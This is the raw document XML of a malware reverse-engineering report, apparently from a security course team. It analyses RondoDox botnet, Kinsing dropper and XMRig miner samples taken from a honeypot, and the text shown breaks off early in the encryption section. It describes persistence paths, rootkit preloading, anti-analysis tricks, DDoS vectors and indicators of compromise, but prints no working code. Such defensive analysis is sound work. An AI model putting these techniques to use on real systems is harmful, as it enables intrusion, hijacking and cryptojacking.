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B3A5C"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">MALWARE DEEP ANALYSIS REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox Botnet | Kinsing Dropper | XMRig Miner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary Reverse Engineering &amp; Behavioral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Target System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AgricultureInTech Honeypot (203.0.113[.]249)</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Analysis Date</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March 24,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Analyst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CIS-284 Security Team</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Classification</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bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL — INTERNAL USE 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Tools Used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Ghidra 11.3.1, objdump, readelf, strings, UPX</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Samples Analyzed</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3 distinct malware binaries + 1 UPX-unpacked variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Inventory &amp; Hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox Botnet — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.1 Binary Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.2 Encryption &amp; Obfuscation Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.3 Anti-Analysis, Anti-Debugging &amp; Competition Killing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.4 Network Attack Functions (8+ DDoS Vectors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.5 SSH Propagation &amp; Self-Replication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.6 C2 Communication Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.7 Persistence Mechanisms (10+ Paths)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.8 Decompiled Function Map (39 Functions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing Dropper/C2 Agent — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.1 Binary Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.2 Go Symbol Table &amp; Function Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.3 C2 Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.4 Exploitation &amp; Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.5 Miner Deployment &amp; Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.6 Persistence &amp; Anti-Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.7 Rootkit Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    4.8 Live Process Forensics (PID 48227)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kdevtmpfsi (XMRig Miner) — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    5.1 Binary Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    5.2 UPX Packing Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    5.3 Mining Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Chain Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidated Indicators of Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents deep reverse-engineering analysis of three malware binaries recovered from the AgricultureInTech honeypot server (203.0.113[.]249) before system wipe. Analysis was performed using Ghidra 11.3.1 headless decompilation, objdump disassembly, readelf structural analysis, and strings extraction directly on the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a sophisticated ELF64 botnet binary (123 KB) statically linked with musl libc. Full decompilation of all 5,405 lines revealed 266 functions including: a 9-layer custom encryption engine, anti-debugging via TracerPid monitoring, a competition killer that decrypts ~80 encrypted tool/malware names and continuously kills matching processes, 8+ DDoS attack vectors (TCP SYN with custom options, UDP flood, ICMP raw packet flood, HTTP flood, DNS/NTP/SSDP amplification), SSH brute-force propagation, a full self-installer writing to 10+ persistence paths (crontab, init.d, rc.local), daemonization with double-fork, and a watchdog/respawner ensuring continuous operation. The binary uses raw socket operations with XorShift128 PRNG for IP spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a 5.9 MB Go-based dropper/C2 agent with 3,826 functions and 11,130 defined strings. Go symbol recovery revealed the full operational playbook: main.downloadAndExecute, main.masscan, main.redisBrute, main.killer, main.backconnect, main.socks proxy, and main.tryToRunMiner. It maintains communication with 5+ C2 servers and uses the go-resty HTTP library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kdevtmpfsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a UPX-packed XMRig Monero cryptocurrency miner (2.0 MB packed). Ghidra analysis of the packed binary showed only 6 recognizable functions due to UPX compression. When running, it consumed 401% CPU across 4 threads, connecting to mining pool at 185.221.152[.]130:443.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkit Component</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kinsing deployed an ld.so.preload rootkit (libsystem.so) that was previously removed by the security team. Additionally, Kinsing's built-in process monitoring (main.goMkill, main.goProcStat) actively kills analysis tools including top, providing ongoing evasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Sample Inventory &amp; Hashes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400"/>
        <w:gridCol w:w="316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Sample</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SHA-256</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Size</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rondo_dump.bin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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7d69ffa8...d81713ac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123,672 B</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ELF64 x86-64, statically linked, stripped</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kinsing.bak</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">787e2c94...c9c5787c</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5,967,872 B</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ELF64 x86-64, Go binary, stripped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kdevtmpfsi</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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6fc94d8a...7107690b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2,084,964 B</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ELF64 x86-64, UPX packed</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kinsing.bin</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">e3b0c442...7852b855</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0 B (empty)</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Marker/lock file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: rondo_dump.bin and recovered_rondo.bin share the same SHA-256 hash, confirming they are identical copies. Similarly, kdevtmpfsi.bak (SHA-256: 6fc94d8a...7107690b) is an exact duplicate of kdevtmpfsi — a backup copy maintained by Kinsing for miner recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">File Locations on Compromised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Path</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/etc/data/kinsing.bak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On disk</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Primary Kinsing binary backup (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">permissions: 777/rwxrwxrwx</w:t>
            </w:r>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/etc/data/kinsing (deleted)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Memory only</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Running from /proc/48227/exe, deleted from disk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/tmp/kdevtmpfsi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On disk</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XMRig miner, also as /tmp/kdevtmpfsi.bak</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/root/rondo_dump.bin</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On disk</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RondoDox binary, also at /root/recovered_rondo.bin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/tmp/kinsing.bin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On disk (empty)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Empty marker file, 0 bytes</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/dev/shm/kdevtmpfsi</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Referenced in code</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Alternative miner drop path in shared memory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/dev/shm/.ICEd-unix/</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On disk (empty)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Kinsing staging directory — exists but empty at time of capture</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/run/lock/linux.lock</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On disk</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Kinsing lock file for single-instance execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. RondoDox Botnet — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Binary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Architecture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x86-64 (LE)</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Compiler</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GCC (musl libc, statically linked)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Image Base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0x00400000</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.text Section</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0x00400100 – 0x00419C95 (105,366 bytes executable code)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.rodata Section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0x00419CC0 – 0x0041B9E4 (7,461 bytes read-only data)</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.bss Section</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0x0051E020 – 0x00932927 (4,278,536 bytes uninitialized data)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Total Functions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266 (Ghidra-identified)</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Decompiled Functions</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55 (named + significant unnamed)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Defined Strings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150</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Imports/Exports</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0 imports (statically linked), 1 export (entry)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Stripped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Yes — no debug symbols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The massive .bss section (4.2 MB) relative to the tiny binary (123 KB) indicates extensive use of global buffers for network packet construction, encryption state, and attack payloads. Static linking with musl libc ensures maximum portability across Linux distributions without dependency issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Encryption &amp; Obfuscation Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra decompilation revealed two distinct encryption systems: the initialization-time obfuscation engine (FUN_004001c0) and the runtime string decryption routine (FUN_00402530).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
